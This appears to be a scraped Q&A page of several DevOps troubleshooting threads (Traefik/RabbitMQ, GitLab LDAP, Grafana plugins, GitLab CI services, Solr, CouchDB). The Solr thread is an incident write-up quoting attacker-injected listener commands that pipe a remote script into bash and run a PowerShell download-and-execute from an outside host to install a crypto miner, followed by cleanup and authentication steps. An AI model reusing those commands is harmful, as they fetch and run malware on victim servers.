Cannot access RabbitMQ UI on docker container - azure

I'm currently working on a project where I have a virtual machine on Microsoft Azure and I'm trying to have multiple Docker containers to be accessed through different routes with the help of a Traefik reverse proxy. Besides the reverse-proxy, the first service I need to have is RabbitMQ and I should be able to access its user-interface on a /rmq route. Right now, I have the following docker-compose file to build both services:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
And this is the content of my traefik.toml file:
logLevel = "DEBUG"
debug = true
[api]
dashboard = true
insecure = false
debug = true
[providers.docker]
endpoint = "unix:///var/run/docker.sock"
watch = true
[entryPoints]
[entryPoints.web]
address = ":80"
[entryPoints.web-secure]
address = ":443"
[log]
level = "DEBUG"
format = "json"
The enabled_plugins file specifies which RabbitMQ plugins should be activated. Here, I have the rabbitmq_management plugin (among others), which I think is needed to access the RabbitMQ UI. I even checked the logs of the RabbitMQ container and apparently the rabbitmq_management was properly started:
rabbitmq_1 | 2021-01-30 15:50:30.538 [info] <0.730.0> Server startup complete; 7 plugins started.
rabbitmq_1 | * rabbitmq_stomp
rabbitmq_1 | * rabbitmq_federation_management
rabbitmq_1 | * rabbitmq_mqtt
rabbitmq_1 | * rabbitmq_federation
rabbitmq_1 | * rabbitmq_management
rabbitmq_1 | * rabbitmq_web_dispatch
rabbitmq_1 | * rabbitmq_management_agent
rabbitmq_1 | completed with 7 plugins.
rabbitmq_1 | 2021-01-30 15:50:30.539 [info] <0.730.0> Resetting node maintenance status
With these configurations running with docker-compose up, if I try to access HOST.com/rmq, I get a 502 (Bad Gateway) error on the console of my browser. And initially, this was where I was stuck. However, after searching for some help online, I found a different way to specify the traefik port on the RabbitMQ container labels (traefik.http.services.rabbitmq.loadbalancer.server.port=15672) and, with this modification, I don't have the Bad Request error anymore, but I get a lot of ERR_ABORTED 404 (Not Found) errors on the console of my browser (the list bellow does not contain all the errors):
rmq:7 GET http://HOST.com/js/ejs-1.0.min.js net::ERR_ABORTED 404 (Not Found)
rmq:18 GET http://HOST.com/js/charts.js net::ERR_ABORTED 404 (Not Found)
rmq:19 GET http://HOST.com/js/singular/singular.js net::ERR_ABORTED 404 (Not Found)
Refused to apply style from 'http://HOST.com/css/main.css' because its MIME type ('text/plain') is not a supported stylesheet MIME type, and strict MIME checking is enabled.
rmq:27 Uncaught ReferenceError: sync_get is not defined at rmq:27
I don't have much experience with this kind of projects and I don't know if I'm doing something wrong or if there's something missing in these configurations or on the configurations of the virtual machine itself. Do you know what I should do to be able to access the RabbitMQ UI with the URL HOST.com/rmq ?
If I get this running properly, I think I would also be able to configure Docker to only allow access to the Traefik UI with a route such as HOST.com/dashboard, instead of accessing it only with the URL without any routes.
Thanks in advance!

Solved it. I don't know why, but when I used the configuration traefik.http.services.rabbitmq.loadbalancer.server.port=15672, I changed the order of the lines traefik.http.routers.rabbitmq.middlewares=strip-docs and traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq, making the prefix appear before the middleware. Changed that and now I can access the RabbitMQ UI on HOST.com/rmq. So my final docker-compose was this:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.http.services.rabbitmq.loadbalancer.server.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
I'll mark this question as solved, but if you know why the order of these 2 lines matters, please explain for future reference.
Thanks!

Trace of how I determined an answer to suggest for this question, given that I haven't used the specific tools:
By searching rabbitmq admin url, I found the rabbitmq management docs page, which near the top, mentions support of a path prefix setting. I searched the page for that, and under the relevant heading, found that you likely will need to set this setting in your rabbitmq config:
management.path_prefix = /rmq
So, to apply it to your docker config, I looked up the rabbitmq docker image, which discusses that configuration files need to be injected via a bind mount, or can be provided via an esoteric erlang config thing which I'd personally not mess with. Therefore, the steps I'd follow from here would be:
look in the existing rabbitmq image to find out what the default config file in /etc/rabbitmq/rabbitmq.conf is, eg by running docker-compose run rabbitmq cat /etc/rabbitmq/rabbitmq.conf, or an appropriate docker cp command if it turns out rabbitmq sets a docker ENTRYPOINT which prevents use of shell commands on the image command line
add a volume just like you have with enabled plugins but move it one directory upward, mapping rabbit/ to /etc/rabbitmq/, and then put the default config from the container in rabbit/
add that line to the config file
With any luck that should at least get you closer. I'm curious to hear how it goes!
By the way, while looking at the rabbitmq docker image docs, I discovered that there are special tags for if you need management interface support. You may find that you need to switch to one of those instead of plain 3-alpine in order for this to work, eg rabbitmq:3-management-alpine.

Related

GitLab - LDAP Authentication Issue

I am sorry if this issue has already been resolved, but I could not find any related answers.
I am trying to set up a self-hosted gitlab instance through docker-compose, which I wish to connect to an LDAP server.
(I have connected other applications to the same LDAP server in the past without issues, and also the account I am trying to login to is that of a valid user.)
However, no matter what I've tried I keep receiving this error upon login: Could not authenticate you from Ldapmain because "Invalid filter syntax.".
My current docker-compose file is as follows:
version: '3.7'
services:
web:
image: 'gitlab/gitlab-ee:14.8.6-ee.0'
restart: on-failure
hostname: 'host.namespace.com'
container_name: gitlab-ee
environment:
GITLAB_OMNIBUS_CONFIG: |
external_url 'http://host.namespace.com'
gitlab_rails['ldap_enabled'] = true
gitlab_rails['ldap_host'] = 'ldap://something.something.com'
gitlab_rails['ldap_port'] = 389
gitlab_rails['ldap_base'] = 'ou=people,dc=namespace,dc=com'
gitlab_rails['ldap_uid'] = 'uid'
ports:
- '80:80'
- '443:443'
- '22:22'
volumes:
- '/srv/gitlab/config:/etc/gitlab'
- '/srv/gitlab/logs:/var/log/gitlab'
- '/srv/gitlab/data:/var/opt/gitlab'
As you can see, in my current configuration I did not set ldap_user_filter at all, since it is not listed as required: https://docs.gitlab.com/ee/administration/auth/ldap/#basic-configuration-settings.
However, I have also tried setting gitlab_rails['ldap_user_filter'] = '' or gitlab_rails['ldap_user_filter'] = '(&(objectClass=zimbraAccount)(uid={login}))' without any luck. Setting gitlab_rails['bind_dn'] and other attributes did not help as well. I keep receiving the same "Invalid filter syntax." error over and over again.
Could you please point me to the right direction?
Thank you in advance!
FIXED
gitlab_rails['ldap_host'] = 'ldap://something.something.com'
changed to:
gitlab_rails['ldap_host'] = 'something.something.com'

Installing a custom grafana datasource through helm / terraform

I would like to install the alertmanager datasource (https://grafana.com/grafana/plugins/camptocamp-prometheus-alertmanager-datasource/) to my kube-prometheus-stack installation which is being built using terraform and the helm provider. I cannot work out how to get the plugin files to the node running grafana though.
Using a modified values.yaml and feeding to helm with -f values.yaml (please ignore values):
additionalDataSources:
- name: Alertmanager
editable: false
type: camptocamp-prometheus-alertmanager-datasource
url: http://localhost:9093
version: 1
access: default
# optionally
basicAuth: false
basicAuthUser:
basicAuthPassword:
I can see the datasource in grafana but the plugin files do not exist.
Alertmanager visible in list of datasources
However, clicking on the datasource I see
Plugin not found, no installed plugin with that ID
Please note that the grafana pod seems to require a restart to pick up datasource changes as well which I would consider needs fixing at a higher level.
It's actually quite simple to get the files there and I cannot believe I overlooked the simplistic solution. Posting this here in the hope others find it useful.
In the kube-prometheus-stack, values.yaml file, just override the grafana section as follows:
grafana:
.
.
.
plugins:
- camptocamp-prometheus-alertmanager-datasource
- grafana-googlesheets-datasource
- doitintl-bigquery-datasource
- redis-datasource
- xginn8-pagerduty-datasource
- marcusolsson-json-datasource
- grafana-kubernetes-app
- yesoreyeram-boomtable-panel
- savantly-heatmap-panel
- bessler-pictureit-panel
- grafana-polystat-panel
- dalvany-image-panel
- michaeldmoore-multistat-panel
additionalDataSources:
- name: Alertmanager
editable: false
type: camptocamp-prometheus-alertmanager-datasource
url: http://prometheus-kube-prometheus-alertmanager.monitoring:9093
version: 1
access: default
# optionally
basicAuth: false
basicAuthUser:
basicAuthPassword:
where the name / type of the plugin can be found on the installation instructions on the Grafana Plugins page
I made some progress by discovering I could get onto the pod running grafana using:
kubectl exec -it --container grafana prometheus-grafana-5d844b67c6-5p46b -- /bin/sh
The one listed in kubectl get pods was the sidecar.
Then I could run:
kubectl exec -it --container grafana prometheus-grafana-5d844b67c6-5p46b -- grafana-cli plugins install camptocamp-prometheus-alertmanager-datasource
which did the required file installation. After deleting and recreating the pod, there is progress
Keen to hear any comments on the approach or better ideas!

Services in Gitlab-ci start with error "host type networking can't be used with links"

I have a couple services in my .gitlab-ci.yml that I need to start in order to run some tests.
services:
- name: bitnami/rabbitmq:3.8.9
alias: rabbitmq
- name: postgres:latest
alias: postgres
- name: milvusdb/milvus:cpu-latest
alias: milvus
When the pipe line runs I get the following errors about regarding "host type networking can't be used with links" and then my tests are unable to connect to theses services. Any ideas?
Starting service bitnami/rabbitmq:3.8.9 ...
Pulling docker image bitnami/rabbitmq:3.8.9 ...
Using docker image sha256:05842c6800e806410cf801b2953405471944e371d3891c99c5c85b1d65213081 for bitnami/rabbitmq:3.8.9 with digest bitnami/rabbitmq#sha256:e11436ff83c3ede1aeb909fa398fb93990b00f66d8f8ee789334799546551429 ...
Starting service postgres:latest ...
Pulling docker image postgres:latest ...
Using docker image sha256:88590756b1243dbb10fdf02ffc837cd6cbc5a98b8b7aca90dc42172bd35d2ab4 for postgres:latest with digest postgres#sha256:b25265ac1dfa19224fd47dd9f5744aa177248fd64e89f407446559cc7dbc7a23 ...
WARNING: Service postgres:latest is already created. Ignoring.
Starting service milvusdb/milvus:cpu-latest ...
Pulling docker image milvusdb/milvus:cpu-latest ...
Using docker image sha256:de52c89600581e203bc83f0dd984133da75fedbcb254c45cee746695f4f8d1ef for milvusdb/milvus:cpu-latest with digest milvusdb/milvus#sha256:0f2609e575edeea8cafa8525ac8a94ed1da7f3048f938cafa8832be60fbbc25d ...
Waiting for services to be up and running...
*** WARNING: Service runner-rugbzglx-project-101-concurrent-0-65c54561e0ef98bc-milvusdb__milvus-2 probably didn't start properly.
Health check error:
create service container: Error response from daemon: conflicting options: host type networking can't be used with links. This would result in undefined behavior (docker.go:1230:0s)
Service container logs:
*********
*** WARNING: Service runner-rugbzglx-project-101-concurrent-0-65c54561e0ef98bc-bitnami__rabbitmq-0 probably didn't start properly.
Health check error:
create service container: Error response from daemon: conflicting options: host type networking can't be used with links. This would result in undefined behavior (docker.go:1230:0s)
Service container logs:
2021-04-01T16:32:59.685554437Z rabbitmq 16:32:59.68
2021-04-01T16:32:59.688810064Z rabbitmq 16:32:59.68 Welcome to the Bitnami rabbitmq container
2021-04-01T16:32:59.692027343Z rabbitmq 16:32:59.69 Subscribe to project updates by watching https://github.com/bitnami/bitnami-docker-rabbitmq
2021-04-01T16:32:59.695625938Z rabbitmq 16:32:59.69 Submit issues and feature requests at https://github.com/bitnami/bitnami-docker-rabbitmq/issues
2021-04-01T16:32:59.699195720Z rabbitmq 16:32:59.69
2021-04-01T16:32:59.703053245Z rabbitmq 16:32:59.70 INFO ==> ** Starting RabbitMQ setup **
2021-04-01T16:32:59.734132004Z rabbitmq 16:32:59.73 INFO ==> Validating settings in RABBITMQ_* env vars..
2021-04-01T16:32:59.768512663Z rabbitmq 16:32:59.76 INFO ==> Initializing RabbitMQ...
2021-04-01T16:32:59.791219983Z rabbitmq 16:32:59.78 INFO ==> Generating random cookie
2021-04-01T16:32:59.831062410Z rabbitmq 16:32:59.83 INFO ==> Starting RabbitMQ in background...
*********
*** WARNING: Service runner-rugbzglx-project-101-concurrent-0-65c54561e0ef98bc-postgres-1 probably didn't start properly.
Health check error:
create service container: Error response from daemon: conflicting options: host type networking can't be used with links. This would result in undefined behavior (docker.go:1230:0s)
Service container logs:
2021-04-01T16:33:01.060049843Z Error: Database is uninitialized and superuser password is not specified.
2021-04-01T16:33:01.060137811Z You must specify POSTGRES_PASSWORD to a non-empty value for the
2021-04-01T16:33:01.060150522Z superuser. For example, "-e POSTGRES_PASSWORD=password" on "docker run".
2021-04-01T16:33:01.060158849Z
2021-04-01T16:33:01.060165847Z You may also use "POSTGRES_HOST_AUTH_METHOD=trust" to allow all
2021-04-01T16:33:01.060195247Z connections without a password. This is *not* recommended.
2021-04-01T16:33:01.060202850Z
2021-04-01T16:33:01.060209698Z See PostgreSQL documentation about "trust":
2021-04-01T16:33:01.060217076Z https://www.postgresql.org/docs/current/auth-trust.html
*********
The solution is to change network_mode in config.toml configuration file of runner.
[[runners]]
name="myrunner"
[[runners.docker]]
network_mode="host"
You can delete this line(network_mode="host") and docker will use bridge mode by default.

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes

CouchDB in CloudFoundry?

I review the Cloud Foundry project and try to install it on a server
I will use Couchdb as a database service.
My principal question is : How use CouchDB in Cloud Foundry?
I install a CF instance with : vcap_dev_setup -c devbox_all.yml -D mydomain.com
The devbox.yml contains :
$ install :
- all.
In this install the couchdb_node and the couchdb_gateway is present by default.
But it seems to be bug in general.
When I delete a app and I have this error for example :
$ vmc delete notes2
Provisioned service [mongodb-d216a] detected, would you like to delete it? [yN]: y
Provisioned service [redis-8fcdc] detected, would you like to delete it? [yN]: y
Deleting application [notes2]: OK
Deleting service [mongodb-d216a]: Error 503: Unexpected response from service gateway
So I tried to install a CF instance with this config.
(A standard single-node with redis, couch and mongo)
conf.yml :
$ jobs:
install:
- nats_server
- router
- stager
- ccdb
- cloud_controller:
builtin_services:
- redis
- mongodb
- couchdb
- health_manager
- dea
- uaa
- uaadb
- redis_node:
index: "0"
- couchdb_node:
index: "0"
- mongodb_node:
index: "0"
- coudb_gateway
- redis_gateway
- mongodb_gateway
First, this config doesn't work, because the option 'couchdb' is not a valable keyword (In the part built-in services)
So, what I do wrong?
Is in the way to integrate couch and it's not finished last week ?
To continue, I success to install the CF instance without the couchdb built-in services option but with a couchdb_node, and a couchdb_gateway. And they start.
I suppose the service is runnable.
But i can't use 'couchdb' in my app manifest.yml or choose this service to bind on.
(It's seems normal because it's not install as a service)
So, It seems to be close to work, but it's not.
I resquest Ideas, Advice on this subject here because I didn't find people talking about around the web.
Thank's to read me.
Lucas
I decided to try this myself and it appears to work OK. I created a new VCAP instance with vcap_dev_setup and the following configuration ..
---
deployment:
name: "cloudfoundry"
jobs:
install:
- nats_server
- cloud_controller:
builtin_services:
- mysql
- postgresql
- couchdb
- stager
- router
- health_manager
- uaa
- uaadb
- ccdb
- dea
- couchdb_gateway
- couchdb_node:
index: "0"
- postgresql_gateway
- postgresql_node:
index: "0"
- mysql_gateway
- mysql_node:
index: "0"
I was able to bind instances of CouchDB to a node app and read the service info from VCAP_SERVICES, as below;
'{"couchdb-1.2":[{"name":"couchdb-c7eb","label":"couchdb-1.2","plan":"free","tags":["key-value","cache","couchdb-1.2","couchdb"],"credentials":{"hostname":"127.0.0.1","host":"127.0.0.1","port":5984,"username":"7f3c0567-89cc-4240-b249-40d1f4586035","password":"8fef9e88-3df2-46a8-a22c-db02b2917251","name":"dde98c69f-01e9-4e97-b0d6-43bed946da95"}}]}'
I was also able to tunnel the service to a local port and connect to it which you can see in this image
What version of Ubuntu have you used to install VCAP?

Resources